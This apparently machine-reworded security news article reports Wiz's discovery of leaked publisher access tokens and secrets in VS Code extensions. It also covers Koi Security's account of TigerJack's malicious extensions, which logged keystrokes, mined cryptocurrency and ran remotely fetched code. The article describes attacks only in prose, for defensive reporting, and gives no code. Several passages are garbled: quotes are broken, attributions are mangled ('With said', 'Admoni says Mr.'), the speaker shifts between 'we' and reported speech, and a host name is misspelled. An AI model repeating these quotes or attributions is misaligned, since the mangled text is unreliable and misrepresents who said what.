A new study has found that more than 100 Visual Studio Code (VS Code) extension publishers have compromised access tokens that can be exploited by malicious actors to update their extensions, posing significant risks to the software supply chain.
“Leaked VSCode Marketplace or Open VSX PAT [personal access token] Wiz security researcher Rami McCarthy said in a report shared with The Hacker News: “An attacker could distribute updates to a malicious extension directly to the entire installed base. An attacker who discovered this issue would have been able to directly distribute malware to a cumulative installed base of 150,000.”
The cloud security firm noted that publishers often fail to account for the fact that although VS Code extensions are distributed as .vsix files, they may contain hard-coded secrets when unzipped and inspected.
In total, over 550 verified secrets were found, distributed across over 500 extensions from hundreds of different publishers, according to Wiz. The 550 secrets have been found to fall into 67 different types of secrets, including:
AI provider secrets (OpenAI, Gemini, Anthropic, XAI, DeepSeek, Hugging Face, Perplexity, etc.) Cloud service provider secrets (Amazon Web Services (AWS), Google Cloud, GitHub, Stripe, Auth0, etc.) Database secrets (MongoDB, PostgreSQL, Supabase, etc.)
Wiz also noted in the report that over 100 extensions had leaked VS Code Marketplace PATs, accounting for over 85,000 installs. We found an additional 30 extensions with a cumulative installed base of over 100,000 to open VSX access tokens. The majority of flagged extensions are themes.
Because Open VSX is also integrated with artificial intelligence (AI)-powered forks of VS Code such as Cursor and Windsurf, extensions that leak access tokens can significantly expand the attack surface.
As an example, the company said it had identified a VS Code Marketplace PAT that could push targeted malware to employees of a giant $30 billion Chinese company, indicating that the issue also extends to internal and vendor-specific extensions used by organizations.
After making responsible disclosures to Microsoft in late March and April 2025, the Windows maker announced it was revoking the leaked PAT, blocking extensions with verified secrets, and adding a secret scanning feature that notifies developers if a secret is detected.
We recommend that VS Code users limit the number of extensions installed, vet extensions before downloading them, and weigh the pros and cons of enabling automatic updates. We recommend that organizations create an extension inventory and consider a central allowlist for extensions to better respond to reports of malicious extensions.
“This issue highlights the continuing risks of extensions and plugins, and supply chain security in general,” With said. “We continue to validate the impression that any package repository carries a high risk of mass security exposure.”
TigerJack targets VS Code marketplace with malicious extension
The development comes after Koi Security revealed details of a threat actor codenamed TigerJack who allegedly published at least 11 legitimate-looking malicious VS Code extensions using various publisher accounts since early 2025 as part of a “coordinated and systematic” campaign.
“Tigerjack, operating under the identities ab-498, 498, and 498-00, deployed a sophisticated arsenal of extensions that stole source code, mined cryptocurrencies, and established remote backdoors for complete system control,” said security researcher Tuval Admoni.
Two of the malicious extensions (C++ Playground and HTTP Format) garnered over 17,000 downloads before being removed. However, they are still available in Open VSX, and the threat actor republished the same malicious code under a new name on the VS Code Marketplace on September 17, 2025 after its removal.
The remarkable thing about these extensions is that they deliver the promised functionality, which provides full coverage so that unsuspecting developers who may have installed them are unaware of their malicious activities.
Specifically, the C++ Playground extension has been found to capture keystrokes in near real-time through a listener that is triggered after a 500ms delay. The ultimate goal is to steal C++ source code files. The HTTP Format extension, on the other hand, hides malicious code to run the CoinIMP miner and exploit system resources to secretly mine cryptocurrencies.
Three other extensions published by TigerJack under the alias ‘498’, namely cppplayground, httpformat and pythonformat, further increase the risk by incorporating functionality that acts as a backdoor by downloading and executing arbitrary JavaScript from external servers (‘ab498.pythananywhere’).[.]com”) every 20 minutes.
“By checking for new instructions every 20 minutes and using eval() on remotely retrieved code, TigerJack can dynamically push malicious payloads without updating the extension. It can steal credentials or API keys, deploy ransomware, use compromised developer machines as entry points into corporate networks, inject backdoors into projects, and monitor activity in real time.” Admoni says Mr.
Koi Security also pointed out that most of these extensions started out as completely benign tools before any malicious changes were introduced, making them a classic example of a Trojan horse approach. This provides several benefits as it allows threat actors to establish legitimacy and gain attention among users.
Additionally, threat actors can push updates later and compromise the environment, potentially fooling developers who vetted the extension before installing it.
In June 2025, Microsoft announced that it was implementing a multi-step process to protect the VS Code marketplace from malware. This includes an initial scan of all incoming packages for malicious runtime behavior in a sandbox environment, as well as rescans and regular market-wide scans to “ensure everything is safe.”
That said, these security protections apply only to the VS Code Marketplace and not to others, such as the Open VSX Registry. This means that even if a malicious extension is removed from Microsoft’s platform, attackers can easily migrate to less secure alternatives.
“The fragmented security landscape across all markets has created dangerous blind spots that sophisticated attackers are already exploiting,” the company said. “When security operates in silos, threats simply move between platforms without developers even realizing it.”
Source link
